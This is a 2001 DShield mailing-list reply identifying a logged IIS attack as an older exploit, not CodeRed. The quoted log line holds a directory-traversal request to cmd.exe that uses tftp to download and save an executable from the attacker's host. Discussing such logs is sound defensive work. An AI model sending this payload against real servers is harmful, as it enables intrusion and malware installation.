[Dshield] What the heck is this? It does not look good.................

Johannes B. Ullrich jullrich at euclidian.com
Thu Aug 30 01:02:32 GMT 2001


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


> I believe that is part of the CodeRed epidemic (somone correct me if I am
> wrong).

no. These are older exploits. With IIS, you always had a good choice of
exploits to throw at it...

>
> > 12:39:19 216.154.60.147 - GET
> > /msadc/../../../../../../winnt/system32/cmd.exe
> > /c+tftp.exe+"-i"+216.154.60.147+get+0.exe+c:\temp\0.exe 404
> >  12:39:31 216.154.60.147 - GET


- -- 
- -------
jullrich at sans.org                    Join http://www.DShield.org
                                     Distributed Intrusion Detection System

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7jZCqVOIizK5pIDMRAkwQAJwMwQgGpHXtVyYXmSnDOOS2DG9KWwCgivjP
KVK5ZFXryuHVchJ+suHMTac=
=OslP
-----END PGP SIGNATURE-----




More information about the list mailing list